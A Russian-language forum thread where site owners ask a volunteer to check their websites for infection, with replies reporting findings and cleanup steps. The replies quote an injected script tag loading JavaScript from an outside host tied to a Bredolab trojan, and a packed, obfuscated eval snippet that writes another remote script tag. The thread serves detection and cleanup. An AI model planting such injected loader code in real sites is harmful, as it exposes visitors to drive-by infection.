Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

  • Автор темы Автор темы akok
  • Дата начала Дата начала
проверьте пож. хттп://goe.ucoz.ua/ - при открытии только АВАСТ ругается что там вирус...
Пока ничего явно зловредного не вижу.

Добавлено через 56 минут 11 секунд
winset19, в конце страницы

PHP:
</html><script type="text/javascript" src="http://pantscow.ru:****byte.js"></script>

Добавлено через 10 минут 35 секунд
http://safebrowsing.clients.google....irefox&hl=en-GB&site=http://pantscow.ru:8080/

Пока удалось поймать только Trojan.Win32.Jorik.Bredolab.cj
 
проверьте плиз kolyan.net Drongo сказал что получил с него заражение после моей ссылки на него, так же вечером я нашел зверей на своем компе
 
Arbitr, пока ничего не вижу. Понаблюдаю.
 
winset19, в конце страницы

PHP:
</html><script type="text/javascript" src="http://pantscow.ru:****byte.js"></script>

Добавлено через 10 минут 35 секунд
http://safebrowsing.clients.google....irefox&hl=en-GB&site=http://pantscow.ru:8080/

Пока удалось поймать только Trojan.Win32.Jorik.Bredolab.cj


спасибо что ответил ) теперь хотелось бы узнать как его вылечить а то после атаки на комп на всех моих сайтах появилась эта фигня (
 
теперь хотелось бы узнать как его вылечить а то после атаки на комп на всех моих сайтах появилась эта фигня

1. Необходимо провести лечение компьютера
2. Удалить вредоносный код с страницы (зависит от движка сайта). Начните с проверки файлов на FTP возможно они изменены злоумышленниками.
3. Обязательно сменить пароли на FTP и БД (если используете).
 
спасибо )
код нашел в index.php пароли изменил ) если нетрудно то проверь еще раз буду очень признателен!
хттп://moihousse.tk
и еще вот этот
хттп://chromset.ucoz.ru
 
winset19, вечером когда будет доступ до тестовой машины.
 
Проверьте, пожалуйта, хттп://ввв.parfumaniya.com.ua/forum/

Яндекс пишет, что есть вирус на сайте :(
 
winset19, не вижу признаков заражения.

Добавлено через 43 минуты 5 секунд
Проверьте, пожалуйта, хттп://ввв.parfumaniya.com.ua/forum/
Яндекс пишет, что есть вирус на сайте


Сейчас активно ничего систему не атакует, но мне не нравится этот скрипт

PHP:
<script type='text/javascript' language='javascript'>
<!--
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c*******'\\b'+e(c)+'\\b','g'),k[c])}}return p}('2=\'b://9\'+\'.\'+\'d\'+\'s\'+\'e\'+\'a.8/s/g/?4=5\';7.6("<f"+"0 m"+"h"+"o=\'p"+"q"+"3\' 1"+"r=\'1"+"n/i"+"k"+"0\' l"+"c=\'"+2+"\'></j"+"3>");',29,29,'ript|t|K406|ipt|sid|113673|write|document|net|juriy||http||oko|hechk|sc|puiFq8693|ngua|jav|scr|asc|sr|la|ext|ge|ja|vascr|ype|'.split('|'),0,{}))
// -->
</script>

В конце цепочки сидит
http://juriy.okoshechka.net/***I3621/?sid=113673&seed=68135797

Данные на том сайте мне сейчас недоступны.

Это вы устанавливали этот код?
 
спасибо,
вроде на все сайты перезалил движки
а вот с этих все равно при входе каспер пишет мошеничество (
хттп://kompaz.tk
хттп://bazatvorchestva.tk
проверь эти если не трудно, движок вордпресс )
и яндекс повесил на них заражение (

полностью пересоздал сайты, так что можешь не проверять, спасибо за помощь!
 
Последнее редактирование:
winset19, не вижу признаков заражения.

Добавлено через 43 минуты 5 секунд



Сейчас активно ничего систему не атакует, но мне не нравится этот скрипт

PHP:
<script type='text/javascript' language='javascript'>
<!--
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c*******'\\b'+e(c)+'\\b','g'),k[c])}}return p}('2=\'b://9\'+\'.\'+\'d\'+\'s\'+\'e\'+\'a.8/s/g/?4=5\';7.6("<f"+"0 m"+"h"+"o=\'p"+"q"+"3\' 1"+"r=\'1"+"n/i"+"k"+"0\' l"+"c=\'"+2+"\'></j"+"3>");',29,29,'ript|t|K406|ipt|sid|113673|write|document|net|juriy||http||oko|hechk|sc|puiFq8693|ngua|jav|scr|asc|sr|la|ext|ge|ja|vascr|ype|'.split('|'),0,{}))
// -->
</script>

В конце цепочки сидит
http://juriy.okoshechka.net/***I3621/?sid=113673&seed=68135797

Данные на том сайте мне сейчас недоступны.

Это вы устанавливали этот код?



это код тизерной сети. убрал, спасибо
 
Проверьте, пожалуйста, сайт hттp://himikell-4it.clan.su. У моего брата он постоянно с включением браузера запускался, а теперь когда включаешь браузер, аваст и anti-malware сразу все блокируют. Друзья брата, которые держат этот сайт, говорят, что там ниче нет.
 
Оля1990, я не вижу признаков взлома.
 
Arbitr, обычные мошенники.
 
хттп://peskomment.ru/ прошу проверить главную страницу, постоянно лезет вирус, все обыскал нет вирусов, и онлайн вирусники тоже пишут нет вирусов.

Зарание спасибо..
 
Спасибо :)
Что-то сообщение не могу отредактировать,только добавить...
 
хттп://peskomment.ru/ прошу проверить главную страницу, постоянно лезет вирус, все обыскал нет вирусов, и онлайн вирусники тоже пишут нет вирусов.
Зарание спасибо..


Ничего не вижу. Нужны скриншоты и больше информации.
 
Назад
Сверху Снизу